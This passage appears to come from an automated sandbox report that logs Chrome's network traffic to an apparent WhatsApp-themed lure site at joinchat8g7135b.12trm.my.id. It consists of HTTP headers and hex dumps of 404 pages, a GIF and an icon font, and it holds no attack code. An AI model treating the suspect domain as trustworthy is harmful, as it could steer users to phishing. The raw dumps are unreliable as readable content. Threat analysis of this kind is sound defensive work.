                          Referer: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:16 UTC636INHTTP/1.1 404 Not Found
                          Date: Mon, 27 May 2024 22:30:16 GMT
                          Content-Type: text/html; charset=iso-8859-1
                          Transfer-Encoding: chunked
                          Connection: close
                          Cache-Control: max-age=14400
                          CF-Cache-Status: EXPIRED
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k8orVNajS4IY7F%2FrPW0XcB5jHmiIKq0gQDnMtAlse%2Fn%2FYghTjtVg2Bea1bw6URON27xqbur1Yd9jzFQyLUsDB8pfL%2FynfPy7y1r3LM3R%2BacDnmOX1mdFhekap2Fj92rvbOdMU9Y7AocSzSal8Vw%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 88a972d0df4b7c99-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-27 22:30:16 UTC322INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                          Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                          2024-05-27 22:30:16 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          15192.168.2.449761104.21.234.2304435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:16 UTC644OUTGET /AlexHostX/all.asset/38984972fb20a70d711e86ac3e6f19e60ea8adc3/AlexHostWA.ttf HTTP/1.1
                          Host: rawcdn.githack.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          Origin: https://joinchat8g7135b.12trm.my.id
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: font
                          Referer: https://joinchat8g7135b.12trm.my.id/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:16 UTC942INHTTP/1.1 404 Not Found
                          Date: Mon, 27 May 2024 22:30:16 GMT
                          Content-Length: 14
                          Connection: close
                          X-GitHub-Request-Id: 44CE:1487FE:18D711:1A3038:665508CF
                          Via: 1.1 varnish
                          X-Served-By: cache-hel1410025-HEL
                          X-Cache: MISS
                          X-Cache-Hits: 0
                          X-Timer: S1716848847.372142,VS0,VE148
                          Vary: Authorization,Accept-Encoding,Origin
                          Cross-Origin-Resource-Policy: cross-origin
                          X-Fastly-Request-ID: e8e1c8ec182d9c6a59e0f02c27c61ea52fa2e833
                          Source-Age: 0
                          Cache-Control: max-age=60, public
                          X-Githack-Cache-Status: HIT
                          CF-Cache-Status: EXPIRED
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FstcbIjvSOp3VY5prUsSWydzdqZtuNYgA1wPIZrG7SdC61HAWu2sN4HpuEAOmYmMB2aRThIcTki8DER510lRMnfSsT8e4OdISuHhXZCkJhZpuuJB5a1EyBTIzRaUDGyOOJxlXpw%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 88a972d0ffd243ff-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-27 22:30:16 UTC14INData Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64
                          Data Ascii: 404: Not Found


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          16192.168.2.44975454.252.28.1724435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:16 UTC615OUTGET /assets/img/loading.gif HTTP/1.1
                          Host: www.starratings.com.au
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://joinchat8g7135b.12trm.my.id/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:16 UTC350INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Mon, 27 May 2024 22:30:16 GMT
                          Content-Type: image/gif
                          Content-Length: 80553
                          Last-Modified: Thu, 30 Dec 2021 07:01:24 GMT
                          Connection: close
                          ETag: "61cd5944-13aa9"
                          Expires: Thu, 31 Dec 2037 23:55:55 GMT
                          Cache-Control: max-age=315360000
                          Strict-Transport-Security: max-age=31536000;
                          Accept-Ranges: bytes
                          2024-05-27 22:30:16 UTC1050INData Raw: 47 49 46 38 39 61 c8 00 c8 00 f7 00 00 00 00 00 00 84 74 00 84 74 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 01 85 75 01 85 75 01 85 75 00 85 75 00 85 75 00 85 75 00 85 75 02 86 76 03 86 77 05 87 77 06 87 78 07 88 78 07 88 78 06 87 78 07 88 78 08 88 79 08 88 79 09 89 79 0b 8a 7a 0d 8a 7b 0e 8b 7c 0f 8c 7c 10 8c 7d 10 8c 7d 11 8d 7e 13 8e 7f 14 8e 80 15 8f 80 16 8f 81 17 90 81 18 90 82 1a 91 83 1b 91 83 1b 92 84 1c 92 84 1c 92 84 1d 92 84 1f 93 85 21 94 86 23 95 88 25 96 89 27 97 8a 29 98 8b 2a 99 8b 2b 99 8c 2c 99 8c 2d 9a 8d 2e 9a 8d 2f 9b 8e 30 9b 8e 31 9c 8f 33 9d 90 35 9e 91 37 9e 92 38 9f 93 3a a0 94 3b a1 95 3d a1 95 3e a2 96 40 a3 97 42 a4 98 44 a5 99 46 a6 9a 49 a7 9c 4b a9 9d 4f aa 9f 51 ab a0 53 ac
                          Data Ascii: GIF89attuuuuuuuuuuuuuuuuuvwwxxxxxyyyz{||}}~!#%')*+,-./013578:;=>@BDFIKOQS
                          2024-05-27 22:30:16 UTC1400INData Raw: 7b cc f1 9a 7a 6c 30 67 ee fc 79 cc 54 58 a6 4f af 6e dd a5 21 1c da a7 fe 93 e9 ee d2 8d 87 f0 e2 c9 af fc e4 04 bd f6 f1 ea 51 fe 91 e1 5e 7b 99 f8 27 e9 58 a8 6f 1f 7f c9 38 c4 f1 37 dd 7d fe 89 d4 86 80 9b 85 d0 c3 13 5d a8 51 07 1f 82 20 e2 48 26 05 8e 94 06 82 88 95 10 45 1b 89 54 c8 52 18 18 d2 65 43 19 7f 78 e8 d2 16 21 c6 65 42 17 80 98 f8 52 19 29 3a 51 87 8b 30 c9 81 e1 05 56 18 42 23 4c 78 b0 56 5f 09 60 54 b2 23 4c 7e 60 c0 1f 05 58 6c 32 24 4c 87 88 c0 df 0e 2d 2e f9 92 23 2c d4 07 42 1a b6 48 f9 52 2a bc b9 f7 83 22 5a c2 d4 45 7d 58 a4 12 e6 4b 79 b8 f7 c1 1c 67 be 54 09 5c e1 a9 40 48 9b 2f 25 81 9e 0d 8d d0 e9 d2 85 e1 0d a1 89 9e 2d 35 72 41 78 4e a0 02 68 4b 50 84 77 c5 a1 2d f1 11 1e 14 b7 30 ba 92 2c d2 4d b7 04 2b 92 ae c4 27 73 41
                          Data Ascii: {zl0gyTXOn!Q^{'Xo87}]Q H&ETReCx!eBR):Q0VB#LxV_`T#L~`Xl2$L-.#,BHR*"ZE}XKygT\@H/%-5rAxNhKPw-0,M+'sA
                          2024-05-27 22:30:16 UTC1400INData Raw: 26 fd 13 1d fc 22 08 07 6d a4 91 2c d8 00 5a ff 7a 8b 0d 59 5a d2 26 b4 40 55 03 73 a6 02 5b 50 d2 99 14 71 85 59 3a 78 32 17 b8 82 4f f5 04 89 bb 5e 58 32 72 55 e9 a1 2a 01 06 e1 7e 58 2e 23 40 eb ad 30 73 d2 0b eb c0 0c ed f5 55 21 c4 50 03 fc d6 40 0c 88 c0 17 20 bc 60 49 e6 ce c0 0b f5 13 58 21 da 40 85 16 9c f6 05 54 70 83 3b 6b 56 88 37 54 61 07 33 d5 ce 07 7e 50 85 37 1c c2 6c 92 e8 43 1c c8 50 05 b0 ec 80 06 64 19 cd 07 4c f0 82 1a ec 40 08 49 a8 02 27 19 e2 d0 87 87 c1 ed cd 70 8e b3 9c e7 4c e7 3a db f9 ce 78 ce b3 9e f7 cc e7 3e fb f9 cf 80 0e b4 a0 07 7d 97 80 00 00 21 f9 04 09 03 00 c9 00 2c 00 00 00 00 c8 00 c8 00 87 00 00 00 0e 1c 1b 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75
                          Data Ascii: &"m,ZzYZ&@Us[PqY:x2O^X2rU*~X.#@0sU!P@ `IX!@Tp;kV7Ta3~P7lCPdL@I'pL:x>}!,uuuuuuuuuuuu
                          2024-05-27 22:30:16 UTC1400INData Raw: 4a 98 30 45 91 df 07 56 88 82 26 4c 64 c8 b7 01 14 9e bc 09 53 1a c7 6d 67 c1 12 95 d8 09 53 1f ea 15 d1 88 9f 30 8d 92 c2 76 1d a8 41 68 4c 46 6c 57 83 23 8b c2 b4 86 76 15 5c 01 4c a4 2f 29 e2 5b 74 1f e8 81 e9 4b b3 c4 20 dd 0a 85 7d ea 52 15 d2 e9 e0 a2 a9 2d 29 c2 21 72 fe 45 c0 c6 6a 4b 3a 44 a7 e3 ac 2d b1 11 5d 79 b8 b2 24 0a 09 c9 fd 70 69 af 2b 35 91 dc 0e ad 10 bb 52 20 13 20 d7 42 29 ca ae d4 03 72 1d 20 12 ad 4a 7f 24 07 c7 b5 2a 01 81 5c 82 dc a2 84 48 9e b7 e5 30 6c b8 26 35 fa 5b 07 58 a2 6b 52 23 cd fe f6 85 bb 27 39 01 1c 0c e7 d2 2b 12 30 22 00 67 9a be 24 bd 01 5c 10 00 97 e4 ed 6d 11 40 59 b0 48 99 c4 6b 1b c1 0b 8b c4 c5 6f 09 47 2c 12 7e b7 41 6c f1 47 8a 50 ac f0 c6 1e 7d f1 9b 80 20 7f c4 a5 6d 66 94 ec 51 2b 18 dc 86 01 86 2a 73
                          Data Ascii: J0EV&LdSmgS0vAhLFlW#v\L/)[tK }R-)!rEjK:D-]y$pi+5R B)r J$*\H0l&5[XkR#'9+0"g$\m@YHkoG,~AlGP} mfQ+*s
                          2024-05-27 22:30:16 UTC1400INData Raw: 53 40 00 00 21 f9 04 09 03 00 d5 00 2c 00 00 00 00 c8 00 c8 00 87 00 00 00 10 10 10 45 70 6b 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 01 85 76 04 86 77 06 87 78 07 88 78 08 88 79 08 88 78 08 88 79 09 88 79 09 89 79 0b 8a 7a 0e 8b 7c 10 8c 7d 10 8c 7d 10 8c 7d 11 8d 7e 14 8e 7f 15 8e 80 16 8f 80 18 90 82 1a 91 83 1d 92 84 20 94 86 23 95 87 24 96 88 25 96 89 26 97 89 27 97 8a 29 98 8b 2a 99 8b 2b 99 8b 2c 9a 8c 2e 9b 8d 31 9c 8f 34 9d 90 36 9e 92 39 a0 93 3c a1 95 3e a2 96 40 a3 97 43 a5 99 46 a6 9a 49 a7 9c 4c a9
                          Data Ascii: S@!,Epkuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuvwxxyxyyyz|}}}~ #$%&')*+,.1469<>@CFIL
                          2024-05-27 22:30:16 UTC1400INData Raw: dc b8 fc aa c4 2e 70 36 c4 19 30 4a e6 fe 76 c7 c1 29 81 b2 69 6d 53 30 9c d2 19 c0 cd 70 ac c4 24 a1 f9 5b 1b 18 9f c4 07 70 40 08 d3 b1 49 52 00 77 e9 c8 24 6d 42 c2 6f 46 a0 5c d2 18 c0 11 e2 32 49 82 d6 06 c5 cc 23 3d 02 5c 6e 38 87 a4 6c 6d 3e f4 2c 52 7d b5 a5 21 34 48 ae 3c 8c da 0a a5 1c fd 51 1d bf 5d e1 f4 47 7a d2 c6 f3 d4 1c 01 51 5b 0c e9 62 ad 11 2c f9 a2 56 85 d7 1c fd f1 1b 1d 64 6f f4 73 6a 27 b8 92 b6 46 fe a6 76 f3 db 19 0d 51 1b 1a 74 63 04 cb fe ca b4 f9 91 f7 45 89 d4 36 c2 a9 7f 53 a4 47 6d 41 14 6e 91 1b 10 2b 5e 91 a3 b4 99 e1 38 45 b1 d2 76 f2 e4 11 41 51 9b ab 98 47 a4 18 6d 8f 74 1e 91 c6 a9 89 1e d1 89 a8 b9 60 3a 44 a8 9f 66 c3 ea 0f d9 40 5b 0d b0 3b 34 2a 6a b4 d7 ce 10 0d b3 eb ce 90 0c b4 d1 e0 fb 42 31 d0 26 c3 f0 0a 71
                          Data Ascii: .p60Jv)imS0p$[p@IRw$mBoF\2I#=\n8lm>,R}!4H<Q]GzQ[b,Vdosj'FvQtcE6SGmAn+^8EvAQGmt`:Df@[;4*jB1&q
                          2024-05-27 22:30:16 UTC1400INData Raw: 9c 8f 33 9d 90 34 9d 91 36 9e 92 36 9e 92 39 a0 93 3b a1 95 3d a2 96 3f a3 97 41 a4 98 44 a5 99 46 a6 9b 48 a7 9c 4a a8 9c 4c a9 9e 4d a9 9e 4f aa 9f 51 ab a0 53 ac a1 56 ad a3 58 af a4 5a af a5 5b b0 a6 5d b1 a7 5f b2 a8 60 b3 a9 62 b4 aa 65 b5 ab 67 b6 ac 69 b7 ad 6b b8 ae 6d b9 b0 70 ba b1 73 bb b2 75 bc b4 77 bd b5 79 bf b6 7c c0 b8 7f c1 b9 82 c3 bb 84 c3 bc 87 c5 be 8a c6 bf 8c c7 c0 8e c9 c2 90 ca c3 93 cb c4 95 cc c5 97 cd c6 99 ce c7 9a ce c8 9c cf c9 9e d0 ca a0 d1 cb a2 d2 cc a3 d2 cd a3 d3 cd a7 d4 cf aa d6 d1 ad d7 d2 af d8 d3 b0 d9 d4 b2 da d5 b4 db d6 b6 db d7 b8 dc d8 ba de d9 bd df db bf e0 dc c1 e1 dd c3 e2 de c5 e3 df c7 e4 e0 c9 e5 e1 cc e6 e3 ce e7 e4 cf e8 e5 cf e8 e5 d1 e8 e5 d2 e9 e6 d4 ea e7 d7 eb e9 d8 ec ea da ed eb dd ee ec de
                          Data Ascii: 34669;=?ADFHJLMOQSVXZ[]_`begikmpsuwy|
                          2024-05-27 22:30:16 UTC1400INData Raw: 26 1d 6d 1b ce ac 97 b4 b3 6d 65 c4 5e 12 cc aa d1 69 fb 48 80 af e6 f6 ee 20 29 bb 9a d3 c0 87 84 c3 6d a5 14 1f 52 a2 b6 f1 a2 3c 48 34 dc b6 eb f3 1e ed b5 5a 9b d4 77 84 f0 6a d9 7b 64 6e 6a 20 74 df 11 ae ab 89 20 3e 47 b2 36 7f be 46 2e dc 36 d7 fa 18 fd 6b 9b 22 f0 63 84 c4 6d 44 d7 6f 91 c6 ab c9 a1 bf 45 5f 30 dc ff 2a 32 bb d5 5c 61 80 14 91 c3 6d 80 80 c0 89 00 02 37 0d 94 88 25 3e 17 c1 88 7c 2f 35 c1 aa e0 43 ee 67 1b 13 69 d0 21 0d b3 cd ea 3e c8 10 d7 d9 86 15 24 64 c8 22 70 f3 a1 14 2a 84 17 a2 52 0d ec 5c 98 10 2a ad 86 06 34 54 88 17 9a 96 43 84 08 02 37 fe 64 e8 e1 41 78 c1 1e db cc e0 38 42 2c 88 14 70 c3 87 24 16 c4 84 ab 39 99 13 07 52 0a e1 bc 6f 8a d7 68 d7 6d be 80 45 81 64 e9 36 25 d0 44 17 35 21 1c af 75 f1 09 b8 11 41 df a6 18
                          Data Ascii: &mme^iH )mR<H4Zwj{dnj t >G6F.6k"cmDoE_0*2\am7%>|/5Cgi!>$d"p*R\*4TC7dAx8B,p$9RohmEd6%D5!uA
                          2024-05-27 22:30:16 UTC1400INData Raw: e4 f2 f0 e4 f2 f0 e5 f2 f1 e6 f3 f1 e8 f3 f2 e9 f4 f2 ea f4 f3 ea f4 f3 eb f5 f4 eb f5 f4 eb f5 f4 eb f5 f4 ec f5 f4 ed f6 f5 ed f6 f5 ee f6 f5 ee f6 f5 f0 f7 f6 f1 f7 f7 f3 f8 f8 f3 f8 f8 f3 f8 f8 f2 f8 f8 f2 f8 f7 f2 f8 f7 f2 f8 f8 f3 f9 f8 f4 f9 f8 f4 f9 f9 f5 fa f9 f6 fa fa f6 fa fa f7 fb fa f7 fb fa f7 fb fa f8 fb fb f9 fc fb f9 fc fb fa fc fb fa fc fb fb fd fc fb fd fc fc fd fc fc fd fc fc fd fc fd fe fd fd fe fd fd fe fd fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe ff fe fe fe fe fe fe fe fe fe fe fe ff fe fe ff fe fe ff fe fe ff fe fe ff fe fe ff fe fe ff fe fe ff fe fe ff fe fe ff fe fe ff fe fe ff fe fe ff fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                          Data Ascii:
                          2024-05-27 22:30:16 UTC1400INData Raw: b5 69 83 15 2f 62 b6 d4 50 61 8b 16 f1 1b 6d 66 00 c6 8a 0c af 36 84 28 e3 44 52 01 1c 34 a8 71 22 05 4c 8d 13 de 28 11 b9 a5 46 05 40 a3 63 43 ec 00 1c fc e9 d1 21 b7 98 22 6d 82 f0 c7 87 34 01 38 02 2c 24 43 d2 00 1c 2c 28 92 21 89 ab 8d 0a 8a f3 c8 84 a8 f0 87 95 54 c8 18 80 73 82 a4 65 72 20 93 00 21 6a aa f7 c9 83 1c b2 36 9d 2c a5 41 e6 10 9c 2a a8 b2 20 ba 28 61 6d 8a f7 4a 81 78 21 38 3b 58 5e 29 0f b1 b5 5a 0e c4 79 b5 09 c1 8d 7c 49 b5 e0 f8 a0 30 be e4 4f 70 e6 e8 cb 42 88 32 35 8e f2 65 9e 82 e3 01 6d bd 32 11 cc 79 01 5d 6a 69 47 e0 d8 40 4c af 5c 45 be 96 d3 03 4a 96 f2 75 cc 11 02 32 55 79 ca e5 1c 21 16 af 8c 44 06 83 63 84 75 7e d2 0c d7 fe f9 c1 24 5e 09 c0 e5 e4 60 9b 4a e1 5c 5d 04 11 28 eb c4 c0 74 49 e1 c3 0c c6 80 23 f0 a4 40 0d 48
                          Data Ascii: i/bPamf6(DR4q"L(F@cC!"m48,$C,(!Tser !j6,A* (amJx!8;X^)Zy|I0OpB25em2y]jiG@L\EJu2Uy!Dcu~$^`J\](tI#@H


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          17192.168.2.449759104.17.24.144435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:16 UTC738OUTGET /ajax/libs/material-design-iconic-font/2.1.2/fonts/Material-Design-Iconic-Font.woff2?v=2.1.0 HTTP/1.1
                          Host: cdnjs.cloudflare.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          Origin: https://joinchat8g7135b.12trm.my.id
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: font
                          Referer: https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.1.2/css/material-design-iconic-font.min.css
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:16 UTC969INHTTP/1.1 200 OK
                          Date: Mon, 27 May 2024 22:30:16 GMT
                          Content-Type: application/octet-stream; charset=utf-8
                          Content-Length: 38812
                          Connection: close
                          Access-Control-Allow-Origin: *
                          Cache-Control: public, max-age=30672000
                          ETag: "5eb03ed9-979c"
                          Last-Modified: Mon, 04 May 2020 16:12:09 GMT
                          cf-cdnjs-via: cfworker/kv
                          Cross-Origin-Resource-Policy: cross-origin
                          Timing-Allow-Origin: *
                          X-Content-Type-Options: nosniff
                          CF-Cache-Status: MISS
                          Expires: Sat, 17 May 2025 22:30:16 GMT
                          Accept-Ranges: bytes
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yNluVn2QRUNYrRgmviUN8ezDr%2FR9egYRP3P7W3xLhV9kF0FhDG9vWBBz%2FK%2FPU%2B3s5WDauv6qOyAub2yqtFdKi29SYA5%2BBmoSsoVu6bwCc26vgt4lG23ai7uQIc8O%2Flz1Oy9lQy9d"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                          Strict-Transport-Security: max-age=15780000
                          Server: cloudflare
                          CF-RAY: 88a972d1088d7d02-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-27 22:30:16 UTC400INData Raw: 77 4f 46 32 00 01 00 00 00 00 97 9c 00 10 00 00 00 01 96 10 00 00 97 3a 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 46 46 54 4d 1c 1a 1e 06 60 00 82 42 08 0c 09 97 17 11 08 0a 85 aa 50 84 92 32 01 36 02 24 03 97 2a 0b 8b 58 00 04 20 05 84 70 07 ba 38 0c 7f 5b 03 43 71 a6 d8 79 9f 88 31 dd 86 00 ff d5 9c b6 56 71 88 12 d9 dc 41 6d e9 cd 12 c2 ee 5e f3 ba 02 ee fa 1e 07 10 d9 bb cf fe ff ff ff 0d 09 42 46 6c db 80 1b 3f 78 c1 7f 5f b5 2a ab 2a 41 1c af a8 25 08 96 16 4d 75 e5 d2 fb da d4 29 c6 34 5c 42 4d 71 15 ca c5 cf 7a 43 b6 d9 11 74 50 05 5d 35 1a 0d ca 65 93 6a d7 4c fb c5 1a e5 93 63 60 1e b9 77 7d d5 c8 8d aa 11 07 8d 41 22 b9 c2 be 63 dd 31 1d 13 4c b0 20 01 41 51 40 90 ec 1c ee aa 31 49 98 e6 03 79 c1 e0 c0 3a 5e 39
                          Data Ascii: wOF2:?FFTM`BP26$*X p8[Cqy1VqAm^BFl?x_**A%Mu)4\BMqzCtP]5ejLc`w}A"c1L AQ@1Iy:^9
                          2024-05-27 22:30:16 UTC1369INData Raw: 69 a1 b2 6e 67 92 c7 f3 cf 64 32 c0 bb ad 7f a8 c0 e3 c1 03 de 63 8b 83 a5 e2 7b b8 c1 9d a0 a0 e8 06 05 dc 39 52 4b cc 72 a6 96 05 65 19 8d 65 58 5a 77 d5 d5 d5 25 b6 fc 79 53 ef b4 79 95 b6 2e bd 4d 37 5b de 65 b7 d6 0f e8 1f 6d ff b3 a2 04 4f 73 c2 45 2c db e1 8b 65 9f 80 ff ef 09 9a 7d 56 d4 14 f5 76 d5 64 71 ff fb 9a 56 7f ae 72 56 f7 66 7e 74 b9 91 64 a9 11 6c b9 11 6c f9 82 ad dc 94 9c d5 ad cd 36 73 9b 2f 66 67 49 4d 54 d4 c8 ee 61 32 f4 4c 7d 82 81 ed c6 de 91 80 ff 7a dd 2f 2f 88 ca ce e6 cb 9e a2 c6 2e d2 aa 45 a7 87 ba 23 00 2c 36 77 df 20 d6 79 48 a2 c6 3c 06 12 58 ff 5f 85 63 84 bc 57 ea b4 c8 62 1b 03 24 99 d9 b6 d2 49 f7 79 2e fc 97 aa ff 55 33 38 68 5c 80 2d b0 45 42 14 a4 d1 d7 33 63 fc 3a 1f cd 86 ce 25 f9 26 c9 ea 7f 53 f4 f4 cc be 7c
                          Data Ascii: ingd2c{9RKreeXZw%ySy.M7[emOsE,e}VvdqVrVf~tdll6s/fgIMTa2L}z//.E#,6w yH<X_cWb$Iy.U38h\-EB3c:%&S|
                          2024-05-27 22:30:16 UTC1369INData Raw: c3 21 26 8b 16 b0 f0 f6 28 55 de 4e f2 55 8c 9d fd 08 58 79 bb 9f de 1e d6 10 e7 df ae b0 6f 6a a3 62 a1 cd b1 c3 bc e6 87 aa 88 39 32 10 cc 63 35 5c cc c6 4a d0 ba 09 c9 f7 52 35 9c 02 f7 38 d8 16 f6 b9 cb d0 1b 54 dd 9d ae 0d e2 4b cc 3f 45 46 1e 44 cc 55 8f 39 e2 09 3b 4d 62 bd 1f 2a b2 33 36 81 04 4e 46 92 bb e9 0f d8 d9 aa bd bc dd 51 c2 6c 51 53 f4 16 d1 19 28 a3 0a 54 fd b6 2c 6e f7 e6 b9 88 c3 87 7f db f8 85 ef e1 ae e4 80 83 8a 95 3b 01 27 95 32 b8 12 83 3b 49 f0 24 0e 6f 92 e1 4b 2a f8 93 1a 81 a4 41 30 69 df c9 a2 06 fa 0a e4 0e f8 6d e4 f1 f7 a2 43 6c 91 87 7a 16 b6 7d 8b 30 8a 28 10 22 06 84 88 03 21 12 40 88 24 10 22 05 84 48 03 21 32 40 e8 16 50 3b cd 50 bc 5c b0 94 ea ac a8 ce 16 5b 54 52 f0 b5 7f a3 40 31 28 0e 03 2f 48 73 39 61 cb fa 87
                          Data Ascii: !&(UNUXyojb92c5\JR58TK?EFDU9;Mb*36NFQlQS(T,n;'2;I$oK*A0imClz}0("!@$"H!2@P;P\[TR@1(/Hs9a
                          2024-05-27 22:30:16 UTC1369INData Raw: ed 95 1b 31 2e e7 3d 9e 50 07 11 ef 06 d1 6b 78 6b 54 b2 8d 21 51 09 14 70 da df ca b6 a6 04 47 ba a2 76 22 b7 95 b0 e8 61 4d da 99 b7 09 5c 4e 0d 68 4d 40 51 aa 56 a0 67 80 6c df c8 fe a0 14 4a bb b7 05 a6 f5 ef d0 0f 55 39 9f 5e 95 dc b2 0e 7d b6 68 b9 59 59 ba 87 6b ed 89 9e 73 77 c9 89 1c 54 ed 1c ad 9c 55 ab 36 ad 79 dd 14 65 b1 fd 13 0b 74 10 79 35 6b 0a 42 4f 66 45 53 b2 65 b1 c3 7c 03 78 0d fa e5 6b 6b f1 44 85 b7 a7 36 9b 65 af 4e ec 6d da d5 fa 8b 3f 8b 9d 19 e3 ac 22 7d 2e 24 01 4c 18 1d f1 93 e2 11 7e ee 6b df 9c 15 bb 9e 56 9d d7 18 1f 24 f2 6c 2c b7 05 ed ed 2e 45 5f f7 4d 15 16 c5 6f 7e a3 66 ad de 92 bc 32 3f e8 a1 3a 01 53 92 d4 2e 54 c9 ea bb b9 37 3a 87 a6 9b d5 a0 84 7c 02 80 6e 8b 23 6c f5 55 d2 3a b9 5e 99 8f 26 39 24 7e 24 e9 66 64
                          Data Ascii: 1.=PkxkT!QpGv"aM\NhM@QVglJU9^}hYYkswTU6yety5kBOfESe|xkkD6eNm?"}.$L~kV$l,.E_Mo~f2?:S.T7:|n#lU:^&9$~$fd
